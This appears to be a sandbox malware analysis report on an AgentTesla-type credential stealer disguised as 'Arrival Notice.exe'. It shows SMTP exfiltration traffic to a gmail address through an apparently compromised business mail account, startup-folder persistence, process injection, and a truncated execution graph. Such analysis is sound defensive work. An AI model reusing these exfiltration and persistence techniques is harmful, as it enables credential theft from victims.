                                            Jul 3, 2024 21:19:30.898823977 CEST49715587192.168.2.6148.66.136.151EHLO 124406
                                            Jul 3, 2024 21:19:31.246018887 CEST58749715148.66.136.151192.168.2.6250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 124406 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 3, 2024 21:19:31.251593113 CEST49715587192.168.2.6148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 3, 2024 21:19:31.600635052 CEST58749715148.66.136.151192.168.2.6334 UGFzc3dvcmQ6
                                            Jul 3, 2024 21:19:31.968595028 CEST58749715148.66.136.151192.168.2.6235 Authentication succeeded
                                            Jul 3, 2024 21:19:31.970128059 CEST49715587192.168.2.6148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 3, 2024 21:19:32.317286968 CEST58749715148.66.136.151192.168.2.6250 OK
                                            Jul 3, 2024 21:19:32.319353104 CEST49715587192.168.2.6148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 3, 2024 21:19:32.709916115 CEST58749715148.66.136.151192.168.2.6250 Accepted
                                            Jul 3, 2024 21:19:32.710071087 CEST49715587192.168.2.6148.66.136.151DATA
                                            Jul 3, 2024 21:19:33.244626999 CEST58749715148.66.136.151192.168.2.6354 Enter message, ending with "." on a line by itself
                                            Jul 3, 2024 21:19:33.461951017 CEST58749715148.66.136.151192.168.2.6354 Enter message, ending with "." on a line by itself
                                            Jul 3, 2024 21:19:34.598710060 CEST58749716148.66.136.151192.168.2.6220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 12:19:34 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 3, 2024 21:19:34.598845959 CEST49716587192.168.2.6148.66.136.151EHLO 124406
                                            Jul 3, 2024 21:19:34.956429958 CEST58749716148.66.136.151192.168.2.6250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 124406 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 3, 2024 21:19:34.956592083 CEST49716587192.168.2.6148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 3, 2024 21:19:35.308583021 CEST58749716148.66.136.151192.168.2.6334 UGFzc3dvcmQ6
                                            Jul 3, 2024 21:19:35.665596008 CEST58749716148.66.136.151192.168.2.6235 Authentication succeeded
                                            Jul 3, 2024 21:19:35.670042992 CEST49716587192.168.2.6148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 3, 2024 21:19:36.021584988 CEST58749716148.66.136.151192.168.2.6250 OK
                                            Jul 3, 2024 21:19:36.026083946 CEST49716587192.168.2.6148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 3, 2024 21:19:36.414683104 CEST58749716148.66.136.151192.168.2.6250 Accepted
                                            Jul 3, 2024 21:19:36.414815903 CEST49716587192.168.2.6148.66.136.151DATA
                                            Jul 3, 2024 21:19:36.767528057 CEST58749716148.66.136.151192.168.2.6354 Enter message, ending with "." on a line by itself
                                            Jul 3, 2024 21:19:41.205794096 CEST58749717148.66.136.151192.168.2.6421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 3, 2024 21:19:46.320918083 CEST58749718148.66.136.151192.168.2.6421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 3, 2024 21:19:51.064815998 CEST58749719148.66.136.151192.168.2.6220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 12:19:50 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 3, 2024 21:19:51.064949036 CEST49719587192.168.2.6148.66.136.151EHLO 124406
                                            Jul 3, 2024 21:19:51.421468019 CEST58749719148.66.136.151192.168.2.6250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 124406 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 3, 2024 21:19:51.426105976 CEST49719587192.168.2.6148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 3, 2024 21:19:51.781398058 CEST58749719148.66.136.151192.168.2.6334 UGFzc3dvcmQ6
                                            Jul 3, 2024 21:19:52.168433905 CEST58749719148.66.136.151192.168.2.6235 Authentication succeeded
                                            Jul 3, 2024 21:19:52.174422026 CEST49719587192.168.2.6148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 3, 2024 21:19:52.529727936 CEST58749719148.66.136.151192.168.2.6250 OK
                                            Jul 3, 2024 21:19:52.529913902 CEST49719587192.168.2.6148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 3, 2024 21:19:52.928014040 CEST58749719148.66.136.151192.168.2.6250 Accepted
                                            Jul 3, 2024 21:19:52.928183079 CEST49719587192.168.2.6148.66.136.151DATA
                                            Jul 3, 2024 21:19:53.289176941 CEST58749719148.66.136.151192.168.2.6354 Enter message, ending with "." on a line by itself
                                            Jul 3, 2024 21:20:01.521787882 CEST58749721148.66.136.151192.168.2.6220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 12:20:01 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 3, 2024 21:20:01.521977901 CEST49721587192.168.2.6148.66.136.151EHLO 124406
                                            Jul 3, 2024 21:20:01.881588936 CEST58749721148.66.136.151192.168.2.6250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 124406 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 3, 2024 21:20:01.883466005 CEST49721587192.168.2.6148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 3, 2024 21:20:02.237632990 CEST58749721148.66.136.151192.168.2.6334 UGFzc3dvcmQ6
                                            Jul 3, 2024 21:20:02.607398987 CEST58749721148.66.136.151192.168.2.6235 Authentication succeeded
                                            Jul 3, 2024 21:20:02.607568026 CEST49721587192.168.2.6148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 3, 2024 21:20:03.823132992 CEST58749722148.66.136.151192.168.2.6220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 12:20:03 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 3, 2024 21:20:03.823666096 CEST49722587192.168.2.6148.66.136.151EHLO 124406
                                            Jul 3, 2024 21:20:04.170666933 CEST58749722148.66.136.151192.168.2.6250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 124406 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 3, 2024 21:20:04.172276974 CEST49722587192.168.2.6148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 3, 2024 21:20:04.529757023 CEST58749722148.66.136.151192.168.2.6334 UGFzc3dvcmQ6
                                            Jul 3, 2024 21:20:04.883178949 CEST58749722148.66.136.151192.168.2.6235 Authentication succeeded
                                            Jul 3, 2024 21:20:04.883347034 CEST49722587192.168.2.6148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 3, 2024 21:20:05.233011961 CEST58749722148.66.136.151192.168.2.6250 OK
                                            Jul 3, 2024 21:20:05.233273029 CEST49722587192.168.2.6148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 3, 2024 21:20:05.624604940 CEST58749722148.66.136.151192.168.2.6250 Accepted
                                            Jul 3, 2024 21:20:05.624789000 CEST49722587192.168.2.6148.66.136.151DATA
                                            Jul 3, 2024 21:20:05.971734047 CEST58749722148.66.136.151192.168.2.6354 Enter message, ending with "." on a line by itself
                                            Jul 3, 2024 21:20:10.380244017 CEST58749723148.66.136.151192.168.2.6421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 3, 2024 21:20:12.454302073 CEST58749724148.66.136.151192.168.2.6421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 3, 2024 21:20:22.144223928 CEST58749725148.66.136.151192.168.2.6220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 12:20:21 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 3, 2024 21:20:22.144921064 CEST49725587192.168.2.6148.66.136.151EHLO 124406
                                            Jul 3, 2024 21:20:22.496891022 CEST58749725148.66.136.151192.168.2.6250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 124406 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 3, 2024 21:20:22.497031927 CEST49725587192.168.2.6148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 3, 2024 21:20:22.848830938 CEST58749725148.66.136.151192.168.2.6334 UGFzc3dvcmQ6
                                            Jul 3, 2024 21:20:23.409730911 CEST58749725148.66.136.151192.168.2.6235 Authentication succeeded
                                            Jul 3, 2024 21:20:23.409971952 CEST49725587192.168.2.6148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 3, 2024 21:20:23.419549942 CEST58749725148.66.136.151192.168.2.6235 Authentication succeeded
                                            Jul 3, 2024 21:20:23.765284061 CEST58749725148.66.136.151192.168.2.6250 OK
                                            Jul 3, 2024 21:20:23.765521049 CEST49725587192.168.2.6148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 3, 2024 21:20:24.157167912 CEST58749725148.66.136.151192.168.2.6250 Accepted
                                            Jul 3, 2024 21:20:24.157366037 CEST49725587192.168.2.6148.66.136.151DATA
                                            Jul 3, 2024 21:20:24.508184910 CEST58749725148.66.136.151192.168.2.6354 Enter message, ending with "." on a line by itself
                                            Jul 3, 2024 21:20:24.530154943 CEST49725587192.168.2.6148.66.136.151.
                                            Jul 3, 2024 21:20:32.502252102 CEST58749725148.66.136.151192.168.2.6250 OK id=1sP5Wi-005kNE-17
                                            Jul 3, 2024 21:20:34.212184906 CEST49725587192.168.2.6148.66.136.151QUIT
                                            Jul 3, 2024 21:20:34.765074968 CEST58749725148.66.136.151192.168.2.6221 sg2plzcpnl505494.prod.sin2.secureserver.net closing connection
                                            Jul 3, 2024 21:20:35.663155079 CEST58749726148.66.136.151192.168.2.6220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 12:20:35 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 3, 2024 21:20:35.663542986 CEST49726587192.168.2.6148.66.136.151EHLO 124406
                                            Jul 3, 2024 21:20:36.010848999 CEST58749726148.66.136.151192.168.2.6250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 124406 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 3, 2024 21:20:36.011029959 CEST49726587192.168.2.6148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 3, 2024 21:20:36.360214949 CEST58749726148.66.136.151192.168.2.6334 UGFzc3dvcmQ6
                                            Jul 3, 2024 21:20:36.725709915 CEST58749726148.66.136.151192.168.2.6235 Authentication succeeded
                                            Jul 3, 2024 21:20:36.753602028 CEST49726587192.168.2.6148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 3, 2024 21:20:37.101125956 CEST58749726148.66.136.151192.168.2.6250 OK
                                            Jul 3, 2024 21:20:37.101326942 CEST49726587192.168.2.6148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 3, 2024 21:20:37.484868050 CEST58749726148.66.136.151192.168.2.6250 Accepted
                                            Jul 3, 2024 21:20:37.486350060 CEST49726587192.168.2.6148.66.136.151DATA
                                            Jul 3, 2024 21:20:37.832369089 CEST58749726148.66.136.151192.168.2.6354 Enter message, ending with "." on a line by itself
                                            Jul 3, 2024 21:20:49.076396942 CEST58749727148.66.136.151192.168.2.6421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 3, 2024 21:20:59.250492096 CEST58749728148.66.136.151192.168.2.6220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 12:20:59 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 3, 2024 21:20:59.250686884 CEST49728587192.168.2.6148.66.136.151EHLO 124406
                                            Jul 3, 2024 21:20:59.609378099 CEST58749728148.66.136.151192.168.2.6250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 124406 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 3, 2024 21:20:59.610409975 CEST49728587192.168.2.6148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 3, 2024 21:20:59.963426113 CEST58749728148.66.136.151192.168.2.6334 UGFzc3dvcmQ6
                                            Jul 3, 2024 21:21:00.330579996 CEST58749728148.66.136.151192.168.2.6235 Authentication succeeded
                                            Jul 3, 2024 21:21:00.330919027 CEST49728587192.168.2.6148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 3, 2024 21:21:00.680464983 CEST58749728148.66.136.151192.168.2.6250 OK
                                            Jul 3, 2024 21:21:00.680619955 CEST49728587192.168.2.6148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 3, 2024 21:21:01.074122906 CEST58749728148.66.136.151192.168.2.6250 Accepted
                                            Jul 3, 2024 21:21:02.603584051 CEST49728587192.168.2.6148.66.136.151DATA
                                            Jul 3, 2024 21:21:03.594991922 CEST58749729148.66.136.151192.168.2.6220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 12:21:03 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:15:16:53
                                            Start date:03/07/2024
                                            Path:C:\Users\user\Desktop\Arrival Notice.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Arrival Notice.exe"
                                            Imagebase:0x8d0000
                                            File size:1'246'208 bytes
                                            MD5 hash:954F20C5963FC61A5848F7BF9FEF6BA4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:15:16:54
                                            Start date:03/07/2024
                                            Path:C:\Users\user\AppData\Local\directory\name.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Arrival Notice.exe"
                                            Imagebase:0x1b0000
                                            File size:1'246'208 bytes
                                            MD5 hash:954F20C5963FC61A5848F7BF9FEF6BA4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 63%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:15:16:55
                                            Start date:03/07/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Arrival Notice.exe"
                                            Imagebase:0x9b0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2226892130.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2226892130.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2226892130.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2226892130.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2224272082.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2224272082.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:15:17:07
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                            Imagebase:0x7ff736e00000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:15:17:08
                                            Start date:03/07/2024
                                            Path:C:\Users\user\AppData\Local\directory\name.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                            Imagebase:0x1b0000
                                            File size:1'246'208 bytes
                                            MD5 hash:954F20C5963FC61A5848F7BF9FEF6BA4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            Target ID:6
                                            Start time:15:17:09
                                            Start date:03/07/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                            Imagebase:0x460000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4531977929.000000000299B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4531977929.000000000299B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:3.6%
                                              Dynamic/Decrypted Code Coverage:0.4%
                                              Signature Coverage:2.6%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:56
                                              execution_graph 98955 8d107d 98960 8d71eb 98955->98960 98957 8d108c 98991 8f2f80 98957->98991 98961 8d71fb __write_nolock 98960->98961 98994 8d77c7 98961->98994 98965 8d72ba 99006 8f074f 98965->99006 98972 8d77c7 59 API calls 98973 8d72eb 98972->98973 99025 8d7eec 98973->99025 98975 8d72f4 RegOpenKeyExW 98976 90ecda RegQueryValueExW 98975->98976 98980 8d7316 Mailbox 98975->98980 98977 90ecf7 98976->98977 98978 90ed6c RegCloseKey 98976->98978 99029 8f0ff6 98977->99029 98978->98980 98990 90ed7e _wcscat Mailbox __NMSG_WRITE 98978->98990 98980->98957 98981 90ed10 99039 8d538e 98981->99039 98984 90ed38 99042 8d7d2c 98984->99042 98986 8d7b52 59 API calls 98986->98990 98987 90ed52 98987->98978 98989 8d3f84 59 API calls 98989->98990 98990->98980 98990->98986 98990->98989 99051 8d7f41 98990->99051 99116 8f2e84 98991->99116 98993 8d1096 98995 8f0ff6 Mailbox 59 API calls 98994->98995 98996 8d77e8 98995->98996 98997 8f0ff6 Mailbox 59 API calls 98996->98997 98998 8d72b1 98997->98998 98999 8d4864 98998->98999 99055 901b90 98999->99055 99002 8d7f41 59 API calls 99003 8d4897 99002->99003 99057 8d48ae 99003->99057 99005 8d48a1 Mailbox 99005->98965 99007 901b90 __write_nolock 99006->99007 99008 8f075c GetFullPathNameW 99007->99008 99009 8f077e 99008->99009 99010 8d7d2c 59 API calls 99009->99010 99011 8d72c5 99010->99011 99012 8d7e0b 99011->99012 99013 8d7e1f 99012->99013 99014 90f173 99012->99014 99079 8d7db0 99013->99079 99084 8d8189 99014->99084 99017 8d72d3 99019 8d3f84 99017->99019 99018 90f17e __NMSG_WRITE _memmove 99020 8d3f92 99019->99020 99024 8d3fb4 _memmove 99019->99024 99022 8f0ff6 Mailbox 59 API calls 99020->99022 99021 8f0ff6 Mailbox 59 API calls 99023 8d3fc8 99021->99023 99022->99024 99023->98972 99024->99021 99026 8d7f06 99025->99026 99028 8d7ef9 99025->99028 99027 8f0ff6 Mailbox 59 API calls 99026->99027 99027->99028 99028->98975 99031 8f0ffe 99029->99031 99032 8f1018 99031->99032 99034 8f101c std::exception::exception 99031->99034 99087 8f594c 99031->99087 99104 8f35e1 DecodePointer 99031->99104 99032->98981 99105 8f87db RaiseException 99034->99105 99036 8f1046 99106 8f8711 58 API calls _free 99036->99106 99038 8f1058 99038->98981 99040 8f0ff6 Mailbox 59 API calls 99039->99040 99041 8d53a0 RegQueryValueExW 99040->99041 99041->98984 99041->98987 99043 8d7da5 99042->99043 99044 8d7d38 __NMSG_WRITE 99042->99044 99045 8d7e8c 59 API calls 99043->99045 99046 8d7d4e 99044->99046 99047 8d7d73 99044->99047 99050 8d7d56 _memmove 99045->99050 99115 8d8087 59 API calls Mailbox 99046->99115 99049 8d8189 59 API calls 99047->99049 99049->99050 99050->98987 99052 8d7f50 __NMSG_WRITE _memmove 99051->99052 99053 8f0ff6 Mailbox 59 API calls 99052->99053 99054 8d7f8e 99053->99054 99054->98990 99056 8d4871 GetModuleFileNameW 99055->99056 99056->99002 99058 901b90 __write_nolock 99057->99058 99059 8d48bb GetFullPathNameW 99058->99059 99060 8d48da 99059->99060 99061 8d48f7 99059->99061 99062 8d7d2c 59 API calls 99060->99062 99063 8d7eec 59 API calls 99061->99063 99064 8d48e6 99062->99064 99063->99064 99067 8d7886 99064->99067 99068 8d7894 99067->99068 99071 8d7e8c 99068->99071 99070 8d48f2 99070->99005 99072 8d7e9a 99071->99072 99074 8d7ea3 _memmove 99071->99074 99072->99074 99075 8d7faf 99072->99075 99074->99070 99076 8d7fc2 99075->99076 99078 8d7fbf _memmove 99075->99078 99077 8f0ff6 Mailbox 59 API calls 99076->99077 99077->99078 99078->99074 99080 8d7dbf __NMSG_WRITE 99079->99080 99081 8d8189 59 API calls 99080->99081 99082 8d7dd0 _memmove 99080->99082 99083 90f130 _memmove 99081->99083 99082->99017 99085 8f0ff6 Mailbox 59 API calls 99084->99085 99086 8d8193 99085->99086 99086->99018 99088 8f59c7 99087->99088 99096 8f5958 99087->99096 99113 8f35e1 DecodePointer 99088->99113 99090 8f59cd 99114 8f8d68 58 API calls __getptd_noexit 99090->99114 99093 8f598b RtlAllocateHeap 99094 8f59bf 99093->99094 99093->99096 99094->99031 99096->99093 99097 8f59b3 99096->99097 99098 8f5963 99096->99098 99102 8f59b1 99096->99102 99110 8f35e1 DecodePointer 99096->99110 99111 8f8d68 58 API calls __getptd_noexit 99097->99111 99098->99096 99107 8fa3ab 58 API calls __NMSG_WRITE 99098->99107 99108 8fa408 58 API calls 5 library calls 99098->99108 99109 8f32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99098->99109 99112 8f8d68 58 API calls __getptd_noexit 99102->99112 99104->99031 99105->99036 99106->99038 99107->99098 99108->99098 99110->99096 99111->99102 99112->99094 99113->99090 99114->99094 99115->99050 99117 8f2e90 __write 99116->99117 99124 8f3457 99117->99124 99123 8f2eb7 __write 99123->98993 99141 8f9e4b 99124->99141 99126 8f2e99 99127 8f2ec8 DecodePointer DecodePointer 99126->99127 99128 8f2ea5 99127->99128 99129 8f2ef5 99127->99129 99138 8f2ec2 99128->99138 99129->99128 99187 8f89e4 59 API calls _W_expandtime 99129->99187 99131 8f2f58 EncodePointer EncodePointer 99131->99128 99132 8f2f07 99132->99131 99133 8f2f2c 99132->99133 99188 8f8aa4 61 API calls 2 library calls 99132->99188 99133->99128 99136 8f2f46 EncodePointer 99133->99136 99189 8f8aa4 61 API calls 2 library calls 99133->99189 99136->99131 99137 8f2f40 99137->99128 99137->99136 99190 8f3460 99138->99190 99142 8f9e6f EnterCriticalSection 99141->99142 99143 8f9e5c 99141->99143 99142->99126 99148 8f9ed3 99143->99148 99145 8f9e62 99145->99142 99172 8f32f5 58 API calls 3 library calls 99145->99172 99149 8f9edf __write 99148->99149 99150 8f9ee8 99149->99150 99151 8f9f00 99149->99151 99173 8fa3ab 58 API calls __NMSG_WRITE 99150->99173 99164 8f9f21 __write 99151->99164 99176 8f8a5d 58 API calls 2 library calls 99151->99176 99153 8f9eed 99174 8fa408 58 API calls 5 library calls 99153->99174 99156 8f9f15 99158 8f9f1c 99156->99158 99159 8f9f2b 99156->99159 99157 8f9ef4 99175 8f32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99157->99175 99177 8f8d68 58 API calls __getptd_noexit 99158->99177 99162 8f9e4b __lock 58 API calls 99159->99162 99165 8f9f32 99162->99165 99164->99145 99166 8f9f3f 99165->99166 99167 8f9f57 99165->99167 99178 8fa06b InitializeCriticalSectionAndSpinCount 99166->99178 99179 8f2f95 99167->99179 99170 8f9f4b 99185 8f9f73 LeaveCriticalSection _doexit 99170->99185 99173->99153 99174->99157 99176->99156 99177->99164 99178->99170 99180 8f2f9e RtlFreeHeap 99179->99180 99181 8f2fc7 _free 99179->99181 99180->99181 99182 8f2fb3 99180->99182 99181->99170 99186 8f8d68 58 API calls __getptd_noexit 99182->99186 99184 8f2fb9 GetLastError 99184->99181 99185->99164 99186->99184 99187->99132 99188->99133 99189->99137 99193 8f9fb5 LeaveCriticalSection 99190->99193 99192 8f2ec7 99192->99123 99193->99192 99194 8de70b 99197 8dd260 99194->99197 99196 8de719 99198 8dd27d 99197->99198 99214 8dd4dd 99197->99214 99199 912abb 99198->99199 99200 912b0a 99198->99200 99221 8dd2a4 99198->99221 99202 912abe 99199->99202 99210 912ad9 99199->99210 99268 94a6fb 341 API calls __cinit 99200->99268 99204 912aca 99202->99204 99202->99221 99266 94ad0f 341 API calls 99204->99266 99207 8f2f80 __cinit 67 API calls 99207->99221 99208 912cdf 99208->99208 99209 8dd6ab 99209->99196 99210->99214 99267 94b1b7 341 API calls 3 library calls 99210->99267 99211 8dd594 99260 8d8bb2 68 API calls 99211->99260 99214->99209 99277 93a0b5 89 API calls 4 library calls 99214->99277 99216 912c26 99276 94aa66 89 API calls 99216->99276 99217 8dd5a3 99217->99196 99221->99207 99221->99209 99221->99211 99221->99214 99221->99216 99231 8da000 99221->99231 99254 8d88a0 68 API calls __cinit 99221->99254 99255 8d86a2 68 API calls 99221->99255 99256 8d8620 99221->99256 99261 